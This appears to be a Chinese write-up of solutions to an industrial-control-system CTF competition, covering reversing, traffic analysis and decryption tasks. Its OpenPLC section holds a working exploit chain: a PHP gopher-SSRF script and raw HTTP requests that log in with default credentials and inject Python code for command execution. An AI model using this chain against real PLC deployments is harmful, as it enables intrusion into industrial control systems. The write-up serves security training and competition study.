2021年工业信息安全技能大赛-线上第二场WriteUp

WriteUp 3年前 (2021) admin
1,476 0 0

Venom又获奖了

不信你看

虽然打了马赛克

但是他是真的

2021年工业信息安全技能大赛-线上第二场WriteUp2021年工业信息安全技能大赛-线上第二场WriteUp2021年工业信息安全技能大赛-线上第二场WriteUp


2021年工业信息安全技能大赛-线上第二场WriteUp

2021年工业信息安全技能大赛-线上第二场WriteUp


虽然这个一等奖不是你们的

但是这篇WP是你们的

2021年工业信息安全技能大赛-线上第二场WriteUp2021年工业信息安全技能大赛-线上第二场WriteUp2021年工业信息安全技能大赛-线上第二场WriteUp

简单梯形图计算

解题思路

v2 = 3v5 = 70v8 = -1

v1 = 30v2 = 3v3 = 10v3 + v11 = v5 = 70!!! v11 = 60
v8 = -1
v1 = 30v6 =v1 * v6 = v7
v7 + v8 = v9 = v10 = v12 = v1130 * v6 -1 = v9 = -61

2021年工业信息安全技能大赛-线上第二场WriteUp


V6_-2_V11_60

msbackdoor

解题思路


有很多花指令。花指令主要分两种,一个是用call代替jmp,一个是call$ pop add push ret。处理太麻烦了。


patch掉父进程检测(共三处)


2021年工业信息安全技能大赛-线上第二场WriteUp


patch 掉一个联网验证服务器,包括一处网络连接和一个 strcmp,也可以把硬编码的IP替换成127.0.0.1。

2021年工业信息安全技能大赛-线上第二场WriteUp

 

2021年工业信息安全技能大赛-线上第二场WriteUp


然后直接 strace 即可看到实际 C2 的 IP 和端口。2021年工业信息安全技能大赛-线上第二场WriteUp

Industry_noaCry

解题思路

加密算法如下:

tea加密:

2021年工业信息安全技能大赛-线上第二场WriteUp

tea密钥:2021年工业信息安全技能大赛-线上第二场WriteUp


数据经过tea加密后,进行xor,随机种子为当前时间,取随机数后每位异或

2021年工业信息安全技能大赛-线上第二场WriteUp

从zip包里文件的 mtime、ctime、atime 可以推算出随机数种子的大致范围。

2021年工业信息安全技能大赛-线上第二场WriteUp

要加上TEA算法解密部分

#include <stdio.h>  #include <stdint.h>  //解密函数  void decrypt (uint32_t* v, uint32_t* k) {    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up */    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */    for (i=0; i<32; i++) {                         /* basic cycle start */      v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);      v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);      sum -= delta;    }                                              /* end cycle */    v[0]=v0; v[1]=v1;  }  
int main() { uint32_t r[8] = {}; int i; for (i = 0; i < 8; i+=2) { uint32_t v[2]= {r[i], r[i+1]},k[4]={}; // v为要加密的数据是两个32位无符号整数 // k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位 decrypt(v, k); printf("%x%x",v[0],v[1]); } return 0; }
#include<stdio.h>#include<stdlib.h>#include<string.h>#include<time.h>

//解密函数 void decrypt (unsigned int* v, unsigned int* k) { unsigned int v0=v[0], v1=v[1], sum=0x62F35080, i; /* set up */ unsigned int delta=0x458BCD42; /* a key schedule constant */ unsigned int k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */ for (i=0; i<64; i++) { /* basic cycle start */ v1 -= ((((v0<<6) + k2) ^ (v0 + sum + 20) ^ ((v0>>9) + k3))^0x10); v0 -= ((((v1<<6) + k0) ^ (v1 + sum + 11) ^ ((v1>>9) + k1))^0x20); sum -= delta; } /* end cycle */ v[0]=v0; v[1]=v1; }int main(){ char magic[0x32d5]; char tmp[16]; unsigned char png[4] = {0x89, 0x50, 0x4E, 0x47 };
unsigned char tea_key[16] = {0x0D, 0x0E, 0x0A, 0x0D, 0x0B, 0x0E, 0x0E, 0x0F, 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };zc FILE*fp=fopen("flag.png.enc","rb"); int rl=fread(magic,0x32d5,1,fp); printf("%dn",rl); fclose(fp); unsigned char key; int seed=1626940252; srand(seed); for(int i=0;i<0x32d5;i++){ key=(unsigned char)rand(); magic[i]^=key; } for(int k=0;k<0x32d5;k+=16){
decrypt((unsigned int *)(magic+k),(unsigned int *)tea_key); } fp=fopen("flag.png","wb+"); fwrite(magic,0x32d5,1,fp); fclose(fp); return 0;}

S7

解题思路

过滤s7comm-plus.data.function == createobject,发现有写操作

2021年工业信息安全技能大赛-线上第二场WriteUp


添加过滤条件s7comm-plus.data.opcode == 0x31,筛选写操作数据

2021年工业信息安全技能大赛-线上第二场WriteUp

得到字符串ZmxhZ3s5d3pLc0x0bVdmWVduTk00fQ

Base解密得到

flag{9wzKsLtmWfYWnNM4}

Ele

解题思路

分离出goose包,发现所有PDU 的data值都是VBfMWV

2021年工业信息安全技能大赛-线上第二场WriteUp


当goose.appid==8时,Data有变化

2021年工业信息安全技能大赛-线上第二场WriteUp2021年工业信息安全技能大赛-线上第二场WriteUp


提取得到字符串:MZWGCZ33MZNDSV2SKZYGGMCGJQYFQ5DMKV6Q

解三次b32

2021年工业信息安全技能大赛-线上第二场WriteUp

三句话,让 PLC 为你吐 FLAG

解题思路

这个目标用的是 apache2 + php7.3 的方式,打不了 fastcgi ,那可能

127.0.0.1  localhost::1  localhost ip6-localhost ip6-loopbackfe00::0  ip6-localnetff00::0  ip6-mcastprefixff02::1  ip6-allnodesff02::2  ip6-allrouters172.16.237.2  956510a842ce // 这个是最外面的服务自己172.16.238.2  956510a842ce

SSRF扫端口,扫到http://172.16.238.99:8080 访问发现是OpenPLC

gopher打OpenPLC RCE

在OpenPLC的hardware里可以注入自写脚本,直接选择Linux PSM写python代码就可以了

然后用gopher包一下发包就行了

<?php
$u = 'http://192.168.87.114/?url=';// 172.16.238.99:8080/login$data = 'username=openplc&password=openplc';
$addr = "172.16.238.99:8080";$headers = [];$headers[] = "POST /login HTTP/1.1";$headers[] = "Host: $addr";$headers[] = "Content-Type: application/x-www-form-urlencoded";$headers[] = "Content-Length: " . strlen($data);
$data = urlencode($data);$header = urlencode(implode("rn",$headers)."rnrn");$header = str_replace("+","%20",$header);
$ssrf = "gopher://$addr/_" . $header . $data;
$ssrf = $u .urlencode($ssrf);$r = file_get_contents($ssrf);preg_match_all("/Set-Cookie: session=(.+?); Expire/",$r,$m);
$cookie = "session=".$m[1][0];
$addr = "172.16.238.99:8080";$headers = [];$headers[] = "GET /users HTTP/1.1";$headers[] = "Host: $addr";$headers[] = "Cookie: $cookie";$data = '';$header = urlencode(implode("rn",$headers)."rnrn");$header = str_replace("+","%20",$header);
$ssrf = "gopher://$addr/_" . $header;
echo $ssrf . "rn";$ssrf = $u .urlencode($ssrf);echo $ssrf . "rnrn";$r = file_get_contents($ssrf);


整个流程就是

1.使用弱口令openplc登陆(POST /login)

POST /login HTTP/1.1HOST: 172.16.238.99:8080Content-Type: application/x-www-form-urlencodedContent-Length: 33
username=openplc&password=openplc

2.上传自写脚本(POST /hardware)

POST /login HTTP/1.1HOST: 172.16.238.99:8080Content-Type: application/x-www-form-urlencodedCookie: session=.eJw1j8tqwzAQRX-laN1F_MjG0IVBScEwEwRyxWgTWketrFqOcRJsT8i_1y10dTaXwz13cfwc3cWL4jre3LM4tidR3MXThygEcjNZWS8UYcaAwRo1Uazng1QJMrY27jYUqpa4zoh3TLz_xnDyyGUOstmA3nvQNIGhBKXKKQCjqVMwdt34jrjyxE1KsYorE_j16XIL_BYOupwppQz010IGckwho0CzlTag7qJ9VYuNVYsRcmL1Ih7r98GN8b13_fW_5nZx41-ROA-uH7pGPH4Ap_RSTQ.YQOUzA.GaKPU1K1cGJkslzOnjOXF7gbDpgContent-Length: 77
hardware_layer=psm_linux&custom_layer_code=hardware_layer=psm_linux&custom_layer_code=__import__(os).system('ls+-alh+/')

3.编译 (GET /compile-program?file=blank_program.st)

GET /compile-program?file=blank_program.st HTTP/1.1HOST: 172.16.238.99:8080Cookie: session=.eJw1j8tqwzAQRX-laN1F_MjG0IVBScEwEwRyxWgTWketrFqOcRJsT8i_1y10dTaXwz13cfwc3cWL4jre3LM4tidR3MXThygEcjNZWS8UYcaAwRo1Uazng1QJMrY27jYUqpa4zoh3TLz_xnDyyGUOstmA3nvQNIGhBKXKKQCjqVMwdt34jrjyxE1KsYorE_j16XIL_BYOupwppQz010IGckwho0CzlTag7qJ9VYuNVYsRcmL1Ih7r98GN8b13_fW_5nZx41-ROA-uH7pGPH4Ap_RSTQ.YQOUzA.GaKPU1K1cGJkslzOnjOXF7gbDpg

4.启动PLC (GET /start_plc)

GET /start_plc HTTP/1.1HOST: 172.16.238.99:8080Cookie: session=.eJw1j8tqwzAQRX-laN1F_MjG0IVBScEwEwRyxWgTWketrFqOcRJsT8i_1y10dTaXwz13cfwc3cWL4jre3LM4tidR3MXThygEcjNZWS8UYcaAwRo1Uazng1QJMrY27jYUqpa4zoh3TLz_xnDyyGUOstmA3nvQNIGhBKXKKQCjqVMwdt34jrjyxE1KsYorE_j16XIL_BYOupwppQz010IGckwho0CzlTag7qJ9VYuNVYsRcmL1Ih7r98GN8b13_fW_5nZx41-ROA-uH7pGPH4Ap_RSTQ.YQOUzA.GaKPU1K1cGJkslzOnjOXF7gbDpg

5.读取日志(GET /runtime_logs)

GET /runtime_logs HTTP/1.1HOST: 172.16.238.99:8080Cookie: session=.eJw1j8tqwzAQRX-laN1F_MjG0IVBScEwEwRyxWgTWketrFqOcRJsT8i_1y10dTaXwz13cfwc3cWL4jre3LM4tidR3MXThygEcjNZWS8UYcaAwRo1Uazng1QJMrY27jYUqpa4zoh3TLz_xnDyyGUOstmA3nvQNIGhBKXKKQCjqVMwdt34jrjyxE1KsYorE_j16XIL_BYOupwppQz010IGckwho0CzlTag7qJ9VYuNVYsRcmL1Ih7r98GN8b13_fW_5nZx41-ROA-uH7pGPH4Ap_RSTQ.YQOUzA.GaKPU1K1cGJkslzOnjOXF7gbDpg


2021年工业信息安全技能大赛-线上第二场WriteUp2021年工业信息安全技能大赛-线上第二场WriteUp


PCZ

解题思路

力控直接打开,查看界面,界面的名称即为flag

2021年工业信息安全技能大赛-线上第二场WriteUp


mod traffic2021年工业信息安全技能大赛-线上第二场WriteUp


2021年工业信息安全技能大赛-线上第二场WriteUp


flag:flag{i_Love_ICS_security!}

奇怪的工艺图

解题思路

2021年工业信息安全技能大赛-线上第二场WriteUp

发现beifen文件

发现7z文件头格式,少了377A

2021年工业信息安全技能大赛-线上第二场WriteUp

补齐7z头

2021年工业信息安全技能大赛-线上第二场WriteUp

解压发现是wincc项目文件,使用wincc打开

2021年工业信息安全技能大赛-线上第二场WriteUp


2021年工业信息安全技能大赛-线上第二场WriteUp

发现flag在组态文件后面

2021年工业信息安全技能大赛-线上第二场WriteUp2021年工业信息安全技能大赛-线上第二场WriteUp

flag{SPwAvMx0z5jtP5gT}



end


招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析+AI 长期招新

欢迎联系[email protected]



2021年工业信息安全技能大赛-线上第二场WriteUp

版权声明:admin 发表于 2021年8月1日 上午12:00。
转载请注明:2021年工业信息安全技能大赛-线上第二场WriteUp | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...